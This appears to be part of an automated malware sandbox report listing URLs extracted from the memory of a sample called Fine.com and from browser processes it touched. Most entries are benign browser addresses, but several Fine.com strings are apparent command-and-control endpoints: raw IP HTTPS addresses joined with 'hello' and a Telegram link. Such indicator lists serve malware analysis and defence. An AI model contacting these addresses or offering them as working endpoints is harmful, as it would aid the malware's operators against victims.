          Source: Fine.com, 0000000B.00000003.2441321400.0000000000E8D000.00000004.00000020.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2935633690.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2937261877.0000000004010000.00000004.00000800.00020000.00000000.sdmp, Fine.com, 0000000B.00000003.2441368651.0000000004035000.00000004.00000800.00020000.00000000.sdmp, Fine.com, 0000000B.00000003.2441264032.0000000004313000.00000004.00000800.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2939843523.0000000004311000.00000040.00001000.00020000.00000000.sdmp, Fine.com, 0000000B.00000003.2441646535.00000000040BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://116.203.2.210
          Source: Fine.com, 0000000B.00000003.2441321400.0000000000E8D000.00000004.00000020.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2939843523.00000000043B3000.00000040.00001000.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2935633690.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2937261877.0000000004010000.00000004.00000800.00020000.00000000.sdmp, Fine.com, 0000000B.00000003.2441368651.0000000004035000.00000004.00000800.00020000.00000000.sdmp, Fine.com, 0000000B.00000003.2441264032.0000000004313000.00000004.00000800.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2939843523.000000000447D000.00000040.00001000.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2939843523.0000000004311000.00000040.00001000.00020000.00000000.sdmp, Fine.com, 0000000B.00000003.2441646535.00000000040BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://195.201.141.106
          Source: Fine.com, 0000000B.00000002.2935633690.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2935633690.0000000000E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.141.106/
          Source: Fine.com, 0000000B.00000002.2935633690.0000000000E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.141.106/q
          Source: Fine.com, 0000000B.00000002.2939843523.00000000043B3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://195.201.141.106Local
          Source: Fine.com, 0000000B.00000002.2939843523.000000000447D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://195.201.141.106R9
          Source: Fine.com, 0000000B.00000002.2939843523.000000000447D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://195.201.141.106TR
          Source: Fine.com, 0000000B.00000003.2441321400.0000000000E8D000.00000004.00000020.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2935633690.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2937261877.0000000004010000.00000004.00000800.00020000.00000000.sdmp, Fine.com, 0000000B.00000003.2441368651.0000000004035000.00000004.00000800.00020000.00000000.sdmp, Fine.com, 0000000B.00000003.2441264032.0000000004313000.00000004.00000800.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2939843523.0000000004311000.00000040.00001000.00020000.00000000.sdmp, Fine.com, 0000000B.00000003.2441646535.00000000040BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://195.201.141.106hellohttps://116.203.165.251hellohttps://116.203.2.210hello
          Source: Fine.com, 0000000B.00000003.2441321400.0000000000E8D000.00000004.00000020.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2935633690.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2937261877.0000000004010000.00000004.00000800.00020000.00000000.sdmp, Fine.com, 0000000B.00000003.2441368651.0000000004035000.00000004.00000800.00020000.00000000.sdmp, Fine.com, 0000000B.00000003.2441264032.0000000004313000.00000004.00000800.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2939843523.0000000004311000.00000040.00001000.00020000.00000000.sdmp, Fine.com, 0000000B.00000003.2441646535.00000000040BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://195.201.141.106hellohttps://116.203.165.251hellohttps://116.203.2.210hellohttps://t.me/detct
          Source: Fine.com, 0000000B.00000003.2441448125.0000000000F39000.00000004.00000020.00020000.00000000.sdmp, Fine.com, 0000000B.00000003.2441186660.0000000000F0B000.00000004.00000020.00020000.00000000.sdmp, Fine.com, 0000000B.00000003.2441321400.0000000000E8D000.00000004.00000020.00020000.00000000.sdmp, Fine.com, 0000000B.00000003.2441161486.0000000000F39000.00000004.00000020.00020000.00000000.sdmp, Fine.com, 0000000B.00000003.2441097802.0000000004011000.00000004.00000800.00020000.00000000.sdmp, Fine.com, 0000000B.00000003.2441415820.0000000000F0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://195.201.D14
          Source: Fine.com, 0000000B.00000002.2937261877.000000000408F000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2552400999.000003C800C94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557085148.000003C800C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2578550719.000003C800C94000.00000004.00000800.00020000.00000000.sdmp, HDJEU3.11.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: chrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/6574
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7161
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7246
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7308
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7320
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7369
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7382
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7489
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7604
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7714
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7847
          Source: chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899
          Source: chrome.exe, 0000000F.00000003.2578323378.000003C8015BC000.00000004.00000800.00020000.00000000.sdmp, chromecache_468.17.dr, chromecache_471.17.drString found in binary or memory: https://apis.google.com
          Source: msedge.exe, 00000013.00000002.2737076440.000002EC3BB5D000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2680242313.000002EC3BB5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://bard.google.com/
          Source: Fine.com, 0000000B.00000002.2935633690.0000000000F86000.00000004.00000020.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2937261877.000000000408F000.00000004.00000800.00020000.00000000.sdmp, DJMYUA.11.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
          Source: Fine.com, 0000000B.00000002.2935633690.0000000000F86000.00000004.00000020.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2937261877.000000000408F000.00000004.00000800.00020000.00000000.sdmp, DJMYUA.11.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
          Source: chrome.exe, 0000000F.00000003.2552400999.000003C800C94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557085148.000003C800C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2578550719.000003C800C94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
          Source: Fine.com, 0000000B.00000002.2937261877.000000000408F000.00000004.00000800.00020000.00000000.sdmp, HDJEU3.11.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: service_worker_bin_prod.js.20.dr, offscreendocument_main.js.20.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/mathjax/
          Source: Fine.com, 0000000B.00000002.2938149780.00000000042E0000.00000004.00000800.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2937261877.000000000408F000.00000004.00000800.00020000.00000000.sdmp, HDJEU3.11.dr, Web Data.20.dr, XLFUAS.11.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: Fine.com, 0000000B.00000002.2938149780.00000000042E0000.00000004.00000800.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2937261877.000000000408F000.00000004.00000800.00020000.00000000.sdmp, HDJEU3.11.dr, Web Data.20.dr, XLFUAS.11.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/D
          Source: chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/G
          Source: chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/N
          Source: chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Q
          Source: chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/X
          Source: chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/b
          Source: chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/e
          Source: chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/l
          Source: chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/o
          Source: chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/t
          Source: chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/v
          Source: chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/y
          Source: chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/~
          Source: chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
          Source: chrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2585255882.000001CC00974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2541781232.000001CC0071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
          Source: chrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
          Source: msedge.exe, 00000013.00000002.2742749823.000039F8003A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
          Source: chrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs27
          Source: chrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://i.y.qq.com/n2/m/index.html
          Source: DJMYUA.11.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
          Source: chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
          Source: chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
          Source: chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
          Source: chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
          Source: chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
          Source: chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
          Source: chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
          Source: chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
          Source: chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
          Source: chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
          Source: chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
          Source: chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
          Source: chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
          Source: chrome.exe, 0000000F.00000003.2541781232.000001CC0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2584051051.000003C801D84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2584141668.000003C801D8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2
          Source: chrome.exe, 0000000F.00000003.2584080843.000003C801D88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2584051051.000003C801D84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2584141668.000003C801D8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard
          Source: chrome.exe, 0000000F.00000003.2585255882.000001CC00974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2541781232.000001CC0071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
          Source: chrome.exe, 0000000F.00000003.2585255882.000001CC00974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2541781232.000001CC0071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
          Source: chrome.exe, 0000000F.00000003.2541781232.000001CC0071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiments
          Source: chrome.exe, 0000000F.00000003.2578653549.000003C801694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2577610339.000003C801668000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2577470556.000003C801658000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2577531707.000003C801660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2578234940.000003C8015A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2578323378.000003C8015BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search?source=ntp
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://latest.web.skype.com/?browsername=edge_canary_shoreline
          Source: chrome.exe, 0000000F.00000003.2557362056.000003C80120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557574273.000003C8012E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557118101.000003C801090000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/upload
          Source: chrome.exe, 0000000F.00000003.2557362056.000003C80120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557574273.000003C8012E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557118101.000003C801090000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/uploadbyurl
          Source: chrome.exe, 0000000F.00000003.2585255882.000001CC00974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2541781232.000001CC0071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/2
          Source: chrome.exe, 0000000F.00000003.2542294722.000001CC00878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload
          Source: chrome.exe, 0000000F.00000003.2541781232.000001CC0071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload2
          Source: chrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://m.kugou.com/
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://m.soundcloud.com/
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://m.vk.com/
          Source: chrome.exe, 0000000F.00000003.2583910367.000003C8014E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2591995932.000003C8014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/:
          Source: chrome.exe, 0000000F.00000003.2578653549.000003C801694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2577610339.000003C801668000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2577470556.000003C801658000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2577531707.000003C801660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2578234940.000003C8015A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2578323378.000003C8015BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
          Source: chrome.exe, 0000000F.00000003.2583910367.000003C8014E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2552247281.000003C800CD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2591995932.000003C8014E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2552400999.000003C800C94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557085148.000003C800C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2578550719.000003C800C94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
          Source: chrome.exe, 0000000F.00000003.2583910367.000003C8014E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2591995932.000003C8014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/J
          Source: chrome.exe, 0000000F.00000003.2583910367.000003C8014E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2591995932.000003C8014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demo
          Source: msedge.exe, 00000013.00000002.2742749823.000039F8003A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.cn/
          Source: msedge.exe, 00000013.00000002.2742749823.000039F8003A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/
          Source: Cookies.22.drString found in binary or memory: https://msn.comXID/
          Source: Cookies.22.drString found in binary or memory: https://msn.comXIDv10
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://music.amazon.com
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://music.apple.com
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://music.yandex.com
          Source: chrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email2B
          Source: chrome.exe, 0000000F.00000003.2555478690.000003C8010E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myactivity.google.com/
          Source: 000003.log3.20.dr, 2cc80dabc69f58b6_0.20.drString found in binary or memory: https://ntp.msn.com
          Source: Session_13381172587684739.20.drString found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
          Source: msedge.exe, 00000013.00000002.2742749823.000039F8003A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.net/
          Source: chrome.exe, 0000000F.00000003.2578323378.000003C8015BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com
          Source: chrome.exe, 0000000F.00000003.2578550719.000003C800C90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
          Source: chrome.exe, 0000000F.00000003.2578323378.000003C8015BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
          Source: chrome.exe, 0000000F.00000003.2578323378.000003C8015BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://open.spotify.com
          Source: chrome.exe, 0000000F.00000003.2553031453.000003C800A34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
          Source: chrome.exe, 0000000F.00000003.2553031453.000003C800A34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
          Source: chrome.exe, 0000000F.00000003.2553031453.000003C800A34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
          Source: chrome.exe, 0000000F.00000003.2553031453.000003C800A34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
          Source: chrome.exe, 0000000F.00000003.2553031453.000003C800A34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
          Source: chrome.exe, 0000000F.00000003.2553031453.000003C800A34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
          Source: chrome.exe, 0000000F.00000003.2553031453.000003C800A34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://outlook.live.com/mail/0/
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://outlook.office.com/mail/0/
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
